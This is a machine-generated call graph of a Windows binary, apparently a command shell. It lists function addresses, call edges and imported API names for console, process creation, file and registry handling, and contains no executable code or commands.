21060->21062 21065 20875 21061->21065 21066 20818 21061->21066 21064 1bc30 448 API calls 21062->21064 21063->21060 21067 208d2 wcstol 21064->21067 21068 2087f 21065->21068 21069 2e8e7 21065->21069 22157 20bf0 21066->22157 22272 1a7d5 21067->22272 21072 1bc30 448 API calls 21068->21072 21075 20060 5 API calls 21069->21075 21074 2088c 21072->21074 21073 208ec wcstol 21076 1a7d5 21073->21076 22221 16e57 21074->22221 21078 2e8fd GetFullPathNameW 21075->21078 21080 20906 wcstol 21076->21080 21083 2e915 21078->21083 21079 20822 21079->21047 21081 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21079->21081 21088 20922 21080->21088 21085 20871 21081->21085 21082 1dcd0 448 API calls 21082->21083 21083->21082 21084 178e4 448 API calls 21083->21084 21086 2e942 GetFullPathNameW 21083->21086 21091 2e95d 21083->21091 21084->21083 21085->18657 21086->21083 21087 398b5 453 API calls 21087->21088 21088->21069 21088->21087 21089 19abf _vsnwprintf 21088->21089 21095 2198f 3 API calls 21088->21095 22274 20bbb 21088->22274 21089->21088 21090 1bc30 448 API calls 21093 2e99d 21090->21093 21091->21090 22283 33e66 21093->22283 21095->21088 21097 1e5d8 21096->21097 21098 1eda4 21096->21098 21097->18644 21097->18658 21098->21097 21099 1edb7 _wcsicmp 21098->21099 21099->21097 21099->21098 21101 22090 21100->21101 21102 1dcd0 448 API calls 21101->21102 21103 220a9 21102->21103 21104 1b1b0 448 API calls 21103->21104 21129 1e613 21103->21129 21105 220ba 21104->21105 21106 1f410 464 API calls 21105->21106 21105->21129 21107 220d2 21106->21107 21108 220d9 GetConsoleTitleW 21107->21108 21109 2212f 21107->21109 21110 1ad26 450 API calls 21108->21110 21111 22134 GetConsoleTitleW 21109->21111 21112 2217a 21109->21112 21115 220f2 21110->21115 21116 1ad26 450 API calls 21111->21116 21113 22183 21112->21113 21114 2f23f 21112->21114 21120 2219f 21113->21120 21121 2f24d 21113->21121 21113->21129 21118 18bc7 448 API calls 21114->21118 22337 19458 21115->22337 21119 2214d 21116->21119 21118->21129 21123 21a47 916 API calls 21119->21123 21124 178e4 448 API calls 21120->21124 21126 178e4 448 API calls 21121->21126 21122 22107 22396 221b5 21122->22396 21127 22164 21123->21127 21124->21129 21126->21129 22399 221c1 21127->22399 21129->18657 21131 25807 21130->21131 21135 25833 21130->21135 21132 25813 _setjmp3 21131->21132 21133 25825 21132->21133 21132->21135 22500 256c4 21133->22500 21135->18655 21137 1e9b2 21136->21137 21145 1ea65 21136->21145 21138 1e3f0 17 API calls 21137->21138 21146 1e9c3 21138->21146 21139 1eb41 21149 1eb7e iswspace 21139->21149 21150 1eac3 21139->21150 21151 2dd3f 21139->21151 21153 1a62f wcschr 21139->21153 21140 1e9f6 wcschr 21141 1ea3d 21140->21141 21140->21146 21142 1ebf0 GetFileAttributesW 21141->21142 21143 1ec1e 21141->21143 21141->21145 21147 1ebfc 21142->21147 21143->21142 21144 1ea0e wcschr 21144->21146 21148 1ea7e _wcsicmp 21145->21148 21156 1ea99 21145->21156 21146->21139 21146->21140 21146->21141 21146->21144 21146->21145 21147->21145 21148->21145 21149->21139 21149->21150 21150->21151 21152 1eaf7 21150->21152 21157 1dcd0 448 API calls 21151->21157 21154 1eb05 ??_V@YAXPAX 21152->21154 21155 1eb0f 21152->21155 21153->21139 21154->21155 21158 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21155->21158 21156->21150 21156->21151 21159 1ed90 _wcsicmp 21156->21159 21160 2dd80 21157->21160 21161 1ae12 21158->21161 21159->21139 21162 39922 448 API calls 21160->21162 21164 2dd9e 21160->21164 21161->20901 21161->20902 21163 2dd91 longjmp 21162->21163 21163->21164 21166 1b1c9 21165->21166 21167 1dcd0 448 API calls 21166->21167 21168 1af78 21167->21168 21168->20931 21172 1ad26 21168->21172 21286 15ea3 memset 21169->21286 21173 1ad37 21172->21173 21181 1ad40 21172->21181 21174 1dcd0 448 API calls 21173->21174 21173->21181 21175 2cb7b 21174->21175 21176 2cb85 GetConsoleTitleW 21175->21176 21175->21181 21177 2cb9b 21176->21177 21176->21181 21178 1dd20 448 API calls 21177->21178 21183 2cbcd 21178->21183 21179 2cc33 21180 1dc60 2 API calls 21179->21180 21180->21181 21181->20931 21182 2cc2c SetConsoleTitleW 21182->21179 21183->21179 21183->21182 21352 19cc0 21184->21352 21188 1aa66 21187->21188 21189 2c9eb 21187->21189 21559 1aa75 21188->21559 21191 1aa75 489 API calls 21189->21191 21192 1aa6b 21191->21192 21192->20952 21192->21192 21194 1b185 21193->21194 21195 1afdd 21193->21195 21194->21195 21196 2ccfa SetConsoleTitleW 21194->21196 21195->20921 21196->21195 21198 1c709 21197->21198 21248 1c7ae 21197->21248 21198->21248 21739 1b3c1 21198->21739 21199 21cb1 450 API calls 21199->21248 21201 398b5 453 API calls 21201->21248 21203 1e272 453 API calls 21205 1c732 21203->21205 21204 178e4 448 API calls 21204->21248 21205->21248 21208 34191 448 API calls 21208->21248 21212 1c8b3 _get_osfhandle SetFilePointer 21215 1c8da _get_osfhandle GetFileType 21212->21215 21212->21248 21214 1c799 21218 1a16c _close 21214->21218 21217 1c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21215->21217 21215->21248 21216 1caa2 21221 2d3fc 21216->21221 21224 1cabd _get_osfhandle SetFilePointer 21216->21224 21217->21248 21220 1ca81 21218->21220 21219 2d162 memcmp 21219->21248 21222 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21220->21222 21223 21cb1 450 API calls 21221->21223 21225 1ca90 21222->21225 21226 2d409 21223->21226 21224->20950 21225->20950 21228 178e4 448 API calls 21226->21228 21227 26c78 4 API calls 21227->21248 21230 2d427 21228->21230 21229 1c808 MultiByteToWideChar 21229->21248 21231 1c7b8 SetFilePointer 21231->21248 21232 2d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21232->21248 21233 1c86f wcschr 21233->21248 21234 1ca03 iswspace 21235 1ca1e wcschr 21234->21235 21234->21248 21235->21248 21236 1caeb wcschr 21238 2d2b3 _get_osfhandle SetFilePointer 21236->21238 21236->21248 21237 1ca49 wcschr 21237->21248 21239 1cb10 iswspace 21238->21239 21238->21248 21240 1cb25 wcschr 21239->21240 21239->21248 21240->21248 21241 2d322 _get_osfhandle SetFilePointer 21241->21248 21242 2d302 WideCharToMultiByte 21242->21241 21243 1cb50 iswspace 21245 1cb65 wcschr 21243->21245 21243->21248 21244 1cb80 wcschr 21246 1cb96 wcschr 21244->21246 21247 1cbc9 _wcsicmp 21244->21247 21245->21248 21246->21247 21246->21248 21247->21248 21248->21199 21248->21201 21248->21204 21248->21208 21248->21212 21248->21214 21248->21215 21248->21216 21248->21219 21248->21227 21248->21229 21248->21231 21248->21232 21248->21233 21248->21234 21248->21235 21248->21236 21248->21237 21248->21238 21248->21239 21248->21240 21248->21241 21248->21242 21248->21243 21248->21244 21248->21245 21248->21247 21249 2d3d3 WideCharToMultiByte 21248->21249 21249->21248 21748 19e09 21250->21748 21253 19de1 21256 19950 448 API calls 21253->21256 21257 19df7 21253->21257 21254 2c2b9 21255 163bd 448 API calls 21254->21255 21258 2c2d1 21255->21258 21256->21257 21257->20952 21258->21257 21762 39fcf _get_osfhandle GetFileType 21258->21762 21260 2c2e5 21261 1dd98 6 API calls 21260->21261 21262 2c2e9 21260->21262 21261->21262 21262->21257 21263 178e4 448 API calls 21262->21263 21264 2c316 21263->21264 21264->21264 21266 1e3f0 17 API calls 21265->21266 21267 17fa0 21266->21267 21268 18001 21267->21268 21269 17fa4 GetDriveTypeW 21267->21269 21270 18013 21268->21270 21271 1800b ??_V@YAXPAX 21268->21271 21275 17fcf 21269->21275 21278 2b033 21269->21278 21272 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21270->21272 21271->21270 21276 18022 21272->21276 21273 2b05a ??_V@YAXPAX 21273->21270 21274 17fe0 GetVolumeInformationW 21274->21268 21277 2b040 GetLastError 21274->21277 21275->21268 21275->21274 21276->20888 21276->20909 21277->21268 21277->21278 21278->21270 21278->21273 21281 22200 21279->21281 21280 22229 21280->20907 21281->21280 21281->21281 21282 22081 918 API calls 21281->21282 21282->21280 21763 226dc memset 21283->21763 21287 1e3f0 17 API calls 21286->21287 21288 15f21 21287->21288 21289 18e9e 448 API calls 21288->21289 21291 29d0f 21288->21291 21293 29d02 21288->21293 21291->21293 21353 19cd3 21352->21353 21380 19780 21352->21380 21354 1dcd0 448 API calls 21353->21354 21355 19cdd 21354->21355 21356 1a62f wcschr 21355->21356 21355->21380 21380->20952 21560 2ca49 21559->21560 21563 1aa90 21559->21563 21561 1bc30 448 API calls 21560->21561 21577 2ca70 21560->21577 21653 35166 21560->21653 21561->21560 21563->21560 21564 1aacb _wcsnicmp 21563->21564 21565 1ab3d 21564->21565 21566 1aadf _wcsnicmp 21564->21566 21584 23326 21565->21584 21568 2c9fd 21566->21568 21573 1aaf7 21566->21573 21616 353aa 21568->21616 21571 1ab0f 21575 1ab1b wcschr 21571->21575 21583 2cad1 21571->21583 21572 178e4 448 API calls 21576 2cb08 21572->21576 21573->21571 21574 2ca2d wcsrchr 21573->21574 21573->21583 21574->21571 21578 1ab47 21575->21578 21579 1ab29 21575->21579 21582 20060 5 API calls 21577->21582 21577->21583 21582->21583 21583->21572 21585 233ab 21584->21585 21586 2333b 21584->21586 21587 178e4 448 API calls 21585->21587 21586->21585 21588 20060 5 API calls 21586->21588 21589 2f76c 21587->21589 21590 23349 21588->21590 21617 1acb0 448 API calls 21616->21617 21654 3516f 21653->21654 21658 35190 21653->21658 21738 2727b __iob_func 21654->21738 21656 35180 fprintf 21656->21560 21657 351dd 21657->21560 21658->21657 21659 19950 448 API calls 21658->21659 21659->21658 21738->21656 21740 1ab7f 2 API calls 21739->21740 21741 1b3d3 21740->21741 21742 1ab7f 2 API calls 21741->21742 21746 1b3eb 21741->21746 21742->21746 21743 1b3f6 wcschr 21744 1b408 wcschr 21743->21744 21745 1b440 21743->21745 21744->21745 21744->21746 21745->21203 21746->21743 21746->21744 21746->21745 21747 1a62f wcschr 21746->21747 21747->21746 21749 19e14 21748->21749 21761 19dd5 21748->21761 21750 19e8e iswspace 21749->21750 21753 19e19 21750->21753 21751 19e27 iswspace 21752 19e40 21751->21752 21751->21753 21754 19e8e iswspace 21752->21754 21753->21751 21753->21752 21753->21761 21755 19e47 21754->21755 21756 19e62 21755->21756 21757 2c31b _wcsnicmp 21755->21757 21755->21761 21758 19e71 _wcsnicmp 21756->21758 21759 19e67 21756->21759 21757->21759 21757->21761 21758->21759 21758->21761 21760 178e4 448 API calls 21759->21760 21759->21761 21760->21761 21761->21253 21761->21254 21762->21260 21764 1e3f0 17 API calls 21763->21764 21765 227be 21764->21765 21766 228f8 21765->21766 21767 227c8 memset GetEnvironmentVariableW 21765->21767 21769 22912 21766->21769 21770 2290a ??_V@YAXPAX 21766->21770 21768 1e3f0 17 API calls 21767->21768 21771 22830 21768->21771 21772 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21769->21772 21770->21769 21773 228e2 21771->21773 21775 2284a GetEnvironmentVariableW 21771->21775 21774 22925 21772->21774 21773->21766 21776 2f431 ??_V@YAXPAX 21773->21776 21774->20952 21777 2f3b2 21775->21777 21778 22865 21775->21778 21776->21766 21780 19144 448 API calls 21777->21780 21794 19144 21778->21794 21781 2f3cd 21780->21781 21781->21778 21782 178e4 448 API calls 21781->21782 21782->21778 21783 22872 21783->21773 21784 18e9e 448 API calls 21783->21784 21786 2f3e7 21783->21786 21795 1bc30 446 API calls 21794->21795 21796 19172 21795->21796 21797 2b904 21796->21797 21798 1926f 21796->21798 21799 191a6 towupper 21796->21799 21801 2bb35 21796->21801 21804 20060 5 API calls 21796->21804 21806 2054b 446 API calls 21796->21806 21808 2ba93 21796->21808 21810 2669f 446 API calls 21796->21810 21813 192c2 21796->21813 21817 2bad3 21796->21817 21818 3a37a 446 API calls 21796->21818 21797->21783 21797->21797 21800 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21798->21800 21799->21796 21803 1dcd0 446 API calls 21801->21803 21804->21796 21806->21796 21814 3a53d 446 API calls 21808->21814 21809 163bd 446 API calls 21809->21798 21810->21796 21819 178e4 446 API calls 21813->21819 21814->21817 21817->21809 21818->21796 22132 1e7a2 22131->22132 22133 1e7c6 22131->22133 22134 1e7ab wcschr 22132->22134 22137 1e697 22132->22137 22136 1dc60 2 API calls 22133->22136 22133->22137 22135 1e7f4 22134->22135 22134->22137 22138 1dcd0 448 API calls 22135->22138 22136->22137 22137->20960 22137->20966 22144 1e7fe 22138->22144 22139 1e83f 22139->22137 22140 1dc60 2 API calls 22139->22140 22140->22137 22141 1bf70 456 API calls 22141->22144 22142 1dd20 448 API calls 22142->22139 22143 1e8f7 22143->22137 22143->22139 22143->22142 22144->22137 22144->22139 22144->22141 22144->22143 22146 21606 lstrcmpW 22145->22146 22147 21615 lstrcmpiW 22145->22147 22148 2160c 22146->22148 22147->22148 22148->20981 22150 22998 22149->22150 22151 22a09 lstrcmpiW 22150->22151 22152 229ff lstrcmpW 22150->22152 22153 229a0 22150->22153 22151->22153 22152->22153 22153->20981 22155 1a1bd 22154->22155 22155->21024 22156->21024 22158 2054b 448 API calls 22157->22158 22162 20c22 22158->22162 22159 20d9e 22160 1bc30 448 API calls 22159->22160 22215 20e27 22159->22215 22160->22215 22161 210ae 22161->21079 22162->22159 22166 20c93 _wcsnicmp 22162->22166 22194 1dc60 2 API calls 22162->22194 22206 2054b 448 API calls 22162->22206 22208 20d4a 22162->22208 22209 2118f wcstol 22162->22209 22210 2129a wcstol 22162->22210 22162->22215 22163 21436 CreateFileW 22167 2ed11 22163->22167 22168 21457 SetFilePointer SetFilePointer 22163->22168 22164 1dd20 448 API calls 22165 20d6a 22164->22165 22169 1dd20 448 API calls 22165->22169 22170 20cac _wcsnicmp 22166->22170 22166->22215 22171 178e4 448 API calls 22167->22171 22173 1dcd0 448 API calls 22168->22173 22174 20d81 22169->22174 22175 20cc7 _wcsnicmp 22170->22175 22176 2ebf5 22170->22176 22177 2ed1e GetLastError 22171->22177 22172 398b5 453 API calls 22172->22215 22173->22215 22174->22159 22178 2ec27 22174->22178 22179 20ce2 _wcsnicmp 22175->22179 22175->22215 22188 178e4 448 API calls 22176->22188 22177->22161 22183 178e4 448 API calls 22178->22183 22179->22162 22182 21131 _wcsnicmp 22179->22182 22180 2ed00 CloseHandle 22180->22161 22181 2148a ReadFile CloseHandle 22181->22215 22185 21563 wcstol 22182->22185 22186 2114c _wcsnicmp 22182->22186 22189 2ec33 22183->22189 22184 1dd20 448 API calls 22184->22215 22185->22176 22185->22215 22186->22162 22186->22176 22187 212d3 _wpopen 22191 2ece5 22187->22191 22192 212ff feof 22187->22192 22188->22161 22193 39922 448 API calls 22189->22193 22190 2198f 3 API calls 22190->22215 22199 178e4 448 API calls 22191->22199 22197 21313 ferror 22192->22197 22198 2136e _pclose 22192->22198 22202 2ec3b longjmp 22193->22202 22194->22162 22195 21546 22203 1dc60 2 API calls 22195->22203 22196 1dc60 GetProcessHeap RtlFreeHeap 22196->22215 22197->22198 22197->22215 22205 1dd20 448 API calls 22198->22205 22204 2ecf2 GetLastError 22199->22204 22200 2ecb3 _pclose 22200->22161 22201 2134d fgets 22201->22198 22201->22215 22202->22161 22203->22200 22204->22161 22205->22215 22206->22162 22207 213db MultiByteToWideChar 22207->22215 22208->22159 22208->22164 22209->22162 22209->22176 22210->22176 22210->22215 22211 214e7 feof 22211->22197 22211->22215 22212 20f0a wcschr 22212->22215 22213 20fc8 wcschr 22213->22215 22214 1dcd0 448 API calls 22214->22215 22215->22161 22215->22163 22215->22172 22215->22180 22215->22181 22215->22184 22215->22185 22215->22187 22215->22190 22215->22195 22215->22196 22215->22198 22215->22200 22215->22201 22215->22207 22215->22210 22215->22211 22215->22212 22215->22213 22215->22214 22216 2ecc9 22215->22216 22217 20bbb 485 API calls 22215->22217 22219 213b7 memmove 22215->22219 22220 20f90 wcschr 22215->22220 22218 178e4 448 API calls 22216->22218 22217->22215 22218->22161 22219->22215 22220->22215 22222 16f39 22221->22222 22233 16ea7 22221->22233 22223 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22222->22223 22224 16f4e 22223->22224 22224->21079 22225 2a746 22226 398b5 453 API calls 22225->22226 22256 1701a 22226->22256 22227 1a62f wcschr 22227->22233 22228 16f5d 22229 20060 5 API calls 22228->22229 22230 16f64 22229->22230 22232 1acb0 448 API calls 22230->22232 22231 1dcd0 448 API calls 22231->22256 22234 16f6b 22232->22234 22233->22222 22233->22225 22233->22227 22233->22228 22235 20bbb 485 API calls 22233->22235 22238 2198f 3 API calls 22233->22238 22236 2589a 10 API calls 22234->22236 22235->22233 22237 16fa6 22236->22237 22242 18f21 448 API calls 22237->22242 22237->22256 22238->22233 22239 1dc60 2 API calls 22239->22256 22240 398b5 453 API calls 22240->22256 22241 25851 2 API calls 22241->22256 22250 16fbf 22242->22250 22243 2a7fa 22249 1dc60 2 API calls 22243->22249 22244 2198f 3 API calls 22244->22256 22245 18b4d 2 API calls 22245->22256 22246 2a806 22247 39922 448 API calls 22246->22247 22251 2a80b longjmp 22247->22251 22248 1725d 22254 17271 22248->22254 22255 2a851 22248->22255 22249->22246 22250->22246 22252 1dcd0 448 API calls 22250->22252 22250->22256 22253 2a819 22251->22253 22252->22256 22306 221d2 22253->22306 22257 18bc7 448 API calls 22254->22257 22258 39a7d 448 API calls 22255->22258 22256->22231 22256->22239 22256->22240 22256->22241 22256->22243 22256->22244 22256->22245 22256->22246 22256->22248 22263 1dd20 448 API calls 22256->22263 22266 20bbb 485 API calls 22256->22266 22261 1727b GetProcessHeap RtlFreeHeap 22257->22261 22262 2a85c 22258->22262 22260 2a824 22265 21e70 448 API calls 22260->22265 22269 2a835 exit 22260->22269 22264 172ee 8 API calls 22261->22264 22263->22256 22267 17294 22264->22267 22265->22260 22266->22256 22305 172c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22267->22305 22269->22248 22270 1729c GetProcessHeap RtlFreeHeap 22271 172bc 22270->22271 22271->21079 22273 1a7db 22272->22273 22273->21073 22273->22273 22310 1b45a 22274->22310 22277 3769e 459 API calls 22278 2ebcc 22277->22278 22279 33b4e 448 API calls 22278->22279 22280 2ebd5 22279->22280 22281 19950 448 API calls 22280->22281 22282 20bd6 22281->22282 22282->21088 22287 33ea6 22283->22287 22284 3416f 22285 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22284->22285 22286 3418b 22285->22286 22286->21079 22287->22284 22288 1dcd0 448 API calls 22287->22288 22292 33ef9 22288->22292 22289 16e57 499 API calls 22290 33f70 22289->22290 22291 1dc60 2 API calls 22290->22291 22293 33f7b 22291->22293 22292->22284 22292->22289 22294 1dcd0 448 API calls 22293->22294 22295 33fa4 22294->22295 22295->22284 22296 33fe2 FindFirstFileW 22295->22296 22297 34164 22296->22297 22303 34006 22296->22303 22298 1dc60 2 API calls 22297->22298 22298->22284 22299 3413c FindNextFileW 22300 34153 FindClose 22299->22300 22299->22303 22300->22297 22302 1dd20 448 API calls 22302->22303 22303->22299 22303->22300 22303->22302 22304 33e66 499 API calls 22303->22304 22304->22303 22305->22270 22307 221df 22306->22307 22308 221d6 22306->22308 22307->22260 22308->22307 22309 2f25c SetConsoleTitleW 22308->22309 22309->22260 22311 1b46c 22310->22311 22312 1b4c8 22311->22312 22314 1b53c 22311->22314 22317 1b4bf 22311->22317 22318 1b5b0 474 API calls 22311->22318 22320 1b484 22311->22320 22323 1b45a 474 API calls 22311->22323 22313 1b45a 474 API calls 22312->22313 22312->22317 22316 1b4d2 22313->22316 22314->22312 22314->22317 22314->22320 22316->22317 22321 1b45a 474 API calls 22316->22321 22317->22277 22317->22282 22318->22311 22320->22317 22328 1b5b0 22320->22328 22325 1b4e4 22321->22325 22322 1b5b0 474 API calls 22324 1b4a5 22322->22324 22323->22311 22324->22317 22326 1b5b0 474 API calls 22324->22326 22325->22317 22327 1b5b0 474 API calls 22325->22327 22326->22324 22327->22325 22329 1b5c8 22328->22329 22330 1b490 22328->22330 22329->22330 22331 1dcd0 448 API calls 22329->22331 22330->22317 22330->22322 22336 1b5eb 22331->22336 22332 1dd20 448 API calls 22332->22330 22333 1b631 22333->22330 22333->22332 22334 1ee03 474 API calls 22334->22336 22335 201f5 wcsrchr 22335->22336 22336->22330 22336->22333 22336->22334 22336->22335 22336->22336 22402 27d90 22337->22402 22339 19467 InitializeProcThreadAttributeList 22340 2bdf1 GetLastError 22339->22340 22341 194b8 UpdateProcThreadAttribute 22339->22341 22414 35c54 22340->22414 22343 194e7 memset memset GetStartupInfoW 22341->22343 22344 2be0d GetLastError 22341->22344 22346 21d90 451 API calls 22343->22346 22347 35c54 448 API calls 22344->22347 22345 2be03 22345->22344 22348 19579 22346->22348 22349 2be1f DeleteProcThreadAttributeList 22347->22349 22351 1acb0 448 API calls 22348->22351 22350 2be5c 22349->22350 22350->21122 22353 19589 22351->22353 22352 2be49 _local_unwind4 22352->22350 22353->22352 22354 201f5 wcsrchr 22353->22354 22355 195c6 22353->22355 22356 195ae 22354->22356 22403 18235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22355->22403 22356->22355 22358 195b2 lstrcmpW 22356->22358 22358->22355 22360 2be83 22358->22360 22359 195cb 22361 195d8 22359->22361 22365 19711 CreateProcessAsUserW 22359->22365 22419 350d8 22360->22419 22363 195e5 CreateProcessW 22361->22363 22364 2bec4 22361->22364 22366 19608 22363->22366 22369 2bece GetLastError 22364->22369 22365->22366 22368 19612 CloseHandle 22366->22368 22366->22369 22397 221d2 SetConsoleTitleW 22396->22397 22398 221c0 22397->22398 22398->21129 22400 221d2 SetConsoleTitleW 22399->22400 22401 221cc 22400->22401 22401->21129 22402->22339 22403->22359 22418 35c6a 22414->22418 22415 35d93 22415->22345 22416 178e4 448 API calls 22417 35dfe 22416->22417 22417->22345 22418->22415 22418->22416 22420 21d90 451 API calls 22419->22420 22421 350e8 22420->22421 22501 256e2 22500->22501 22502 313ca 22500->22502 22504 256ef 22501->22504 22508 31303 22501->22508 22509 31256 22501->22509 22503 3155c 22502->22503 22505 3126a longjmp 22502->22505 22511 313e2 22502->22511 22512 314e7 22502->22512 22507 25726 449 API calls 22503->22507 22561 25726 22504->22561 22510 31277 22505->22510 22560 312fb 22507->22560 22516 25726 449 API calls 22508->22516 22509->22504 22509->22510 22520 31264 22509->22520 22514 25726 449 API calls 22510->22514 22515 31433 22511->22515 22529 313e7 22511->22529 22521 25726 449 API calls 22512->22521 22513 256fe 22517 25711 22513->22517 22522 25726 449 API calls 22513->22522 22526 31288 22514->22526 22519 257c9 449 API calls 22515->22519 22543 31316 22516->22543 22573 257c9 22517->22573 22518 256c4 449 API calls 22524 31583 22518->22524 22547 3143b 22519->22547 22520->22505 22520->22515 22521->22503 22522->22517 22524->21135 22525 3136e 22527 25726 449 API calls 22525->22527 22534 312c7 22526->22534 22540 25726 449 API calls 22526->22540 22533 31380 22527->22533 22528 313fc 22531 25726 449 API calls 22528->22531 22529->22505 22529->22528 22530 256c4 449 API calls 22536 314c2 22530->22536 22537 2571d 22531->22537 22532 31471 22532->22530 22539 25726 449 API calls 22533->22539 22535 256c4 449 API calls 22534->22535 22541 312d6 22535->22541 22542 25726 449 API calls 22536->22542 22537->21135 22538 25726 449 API calls 22538->22525 22544 31390 22539->22544 22540->22534 22545 256c4 449 API calls 22541->22545 22542->22560 22543->22525 22546 25726 449 API calls 22543->22546 22550 31326 22543->22550 22548 25726 449 API calls 22544->22548 22549 312e3 22545->22549 22546->22550 22547->22532 22551 3147a 22547->22551 22552 3145c 22547->22552 22553 3139f 22548->22553 22549->22537 22557 25726 449 API calls 22549->22557 22550->22525 22550->22538 22555 25726 449 API calls 22551->22555 22552->22532 22558 25726 449 API calls 22552->22558 22554 25726 449 API calls 22553->22554 22556 313b0 22554->22556 22555->22532 22559 25726 449 API calls 22556->22559 22557->22560 22558->22532 22559->22560 22560->22518 22560->22537 22562 2573f 22561->22562 22562->22562 22563 178e4 448 API calls 22562->22563 22566 25781 22562->22566 22564 3159e longjmp 22563->22564 22565 315ae 22564->22565 22567 25726 448 API calls 22565->22567 22566->22513 22568 315c9 22567->22568 22569 25726 448 API calls 22568->22569 22570 315f4 22569->22570 22571 25726 448 API calls 22570->22571 22572 31603 22571->22572 22572->22513 22574 257e4 22573->22574 22574->22537 22575 25726 449 API calls 22574->22575 22576 315c9 22575->22576 22577 25726 449 API calls 22576->22577 22578 315f4 22577->22578 22579 25726 449 API calls 22578->22579 22580 31603 22579->22580 22580->22537 22582 21eb2 22581->22582 22583 2f110 22582->22583 22584 21ebc 22582->22584 22587 21eef 22582->22587 22585 272ef ApiSetQueryApiSetPresence 22583->22585 22584->18689 22586 2f12e 22585->22586 22586->18689 22587->22584 22588 2f15b realloc 22587->22588 22588->22584 22590 26474 22589->22590 22591 26464 NtOpenProcessToken 22589->22591 22592 262fa 22590->22592 22599 26500 NtQueryInformationToken 22590->22599 22591->22590 22592->18701 22592->18702 22595 264a8 22595->22592 22596 264bc NtClose 22595->22596 22596->22592 22598->18719 22600 26534 22599->22600 22601 2648a 22599->22601 22600->22601 22602 32018 NtQueryInformationToken 22600->22602 22601->22595 22603 264ca NtQueryInformationToken 22601->22603 22602->22601 22604 264f3 22603->22604 22604->22595 23097 36910 23098 36921 23097->23098 23099 3692c 23097->23099 23103 35e03 23098->23103 23101 35e03 465 API calls 23099->23101 23102 36926 23101->23102 23126 271a8 23103->23126 23105 35e0f RegOpenKeyExW 23106 35f03 23105->23106 23107 35e45 23105->23107 23106->23102 23108 1bc30 448 API calls 23107->23108 23109 35e57 23108->23109 23110 35e64 23109->23110 23111 20060 5 API calls 23109->23111 23127 35948 23110->23127 23113 35e77 23111->23113 23114 1acb0 448 API calls 23113->23114 23116 35e7e 23114->23116 23116->23110 23120 35e9b 23116->23120 23121 35e6e 23116->23121 23118 35ea0 23119 178e4 448 API calls 23118->23119 23119->23121 23120->23118 23122 1acb0 448 API calls 23120->23122 23196 35f1c 23121->23196 23123 35ec1 23122->23123 23123->23118 23123->23121 23124 35edc 23123->23124 23165 36650 23124->23165 23126->23105 23128 35af8 23127->23128 23146 35970 23127->23146 23129 35b16 23128->23129 23130 35afe 23128->23130 23133 1ab7f 2 API calls 23129->23133 23132 178e4 448 API calls 23130->23132 23131 35990 RegEnumKeyExW 23134 35ae7 23131->23134 23131->23146 23132->23134 23135 35b1d 23133->23135 23138 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 23134->23138 23136 1acb0 448 API calls 23135->23136 23137 35b24 23136->23137 23137->23134 23140 201f5 wcsrchr 23137->23140 23139 35c52 23138->23139 23139->23121 23142 35b3c 23140->23142 23144 35b68 23142->23144 23150 35b7f 23142->23150 23143 35ae2 23145 26c78 4 API calls 23143->23145 23147 178e4 448 API calls 23144->23147 23145->23134 23146->23131 23146->23134 23146->23143 23149 1dc60 2 API calls 23146->23149 23153 19950 448 API calls 23146->23153 23201 362b3 23146->23201 23148 35b74 23147->23148 23152 1dc60 2 API calls 23148->23152 23149->23146 23151 35b9e RegOpenKeyExW 23150->23151 23154 35bd6 23151->23154 23155 35bc4 23151->23155 23152->23134 23153->23146 23157 362b3 453 API calls 23154->23157 23156 178e4 448 API calls 23155->23156 23156->23148 23158 35be7 23157->23158 23159 35c21 23158->23159 23162 35c13 23158->23162 23160 178e4 448 API calls 23159->23160 23161 35c1f 23160->23161 23163 1dc60 2 API calls 23161->23163 23164 19950 448 API calls 23162->23164 23163->23148 23164->23161 23166 36680 23165->23166 23166->23166 23167 3669b 23166->23167 23169 366b0 23166->23169 23168 178e4 448 API calls 23167->23168 23194 366a6 23168->23194 23172 36729 RegOpenKeyExW 23169->23172 23170 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 23171 368da 23170->23171 23171->23121 23173 36831 23172->23173 23175 36755 23172->23175 23174 3689c RegDeleteValueW 23173->23174 23180 3683c RegSetValueExW 23173->23180 23177 368bf RegCloseKey 23174->23177 23178 368af 23174->23178 23176 3681c 23175->23176 23187 36768 23175->23187 23179 178e4 448 API calls 23176->23179 23177->23194 23181 178e4 448 API calls 23178->23181 23179->23194 23185 36873 23180->23185 23186 36881 23180->23186 23182 3687f 23181->23182 23182->23177 23184 367a4 RegCreateKeyExW 23184->23187 23188 36801 23184->23188 23189 19950 448 API calls 23185->23189 23190 178e4 448 API calls 23186->23190 23187->23173 23187->23184 23191 367ea RegCloseKey 23187->23191 23192 178e4 448 API calls 23188->23192 23189->23182 23193 3688a 23190->23193 23191->23187 23192->23194 23195 178e4 448 API calls 23193->23195 23194->23170 23195->23182 23197 1dc60 2 API calls 23196->23197 23198 35f23 23197->23198 23199 1dc60 2 API calls 23198->23199 23200 35ef8 RegCloseKey 23199->23200 23200->23106 23202 362bf 23201->23202 23203 362f3 RegQueryValueExW 23202->23203 23204 362dd RegOpenKeyExW 23202->23204 23205 3631d 23203->23205 23206 3630c 23203->23206 23204->23203 23214 362f0 SetLastError 23204->23214 23210 1dcd0 448 API calls 23205->23210 23205->23214 23207 1acb0 448 API calls 23206->23207 23209 36316 23207->23209 23218 36387 23209->23218 23211 36329 23210->23211 23213 36332 RegQueryValueExW 23211->23213 23211->23214 23213->23209 23216 3634c 23213->23216 23214->23209 23217 1dc60 2 API calls 23216->23217 23217->23214 23219 3636f 23218->23219 23220 3638c RegCloseKey 23218->23220 23219->23146 23220->23219 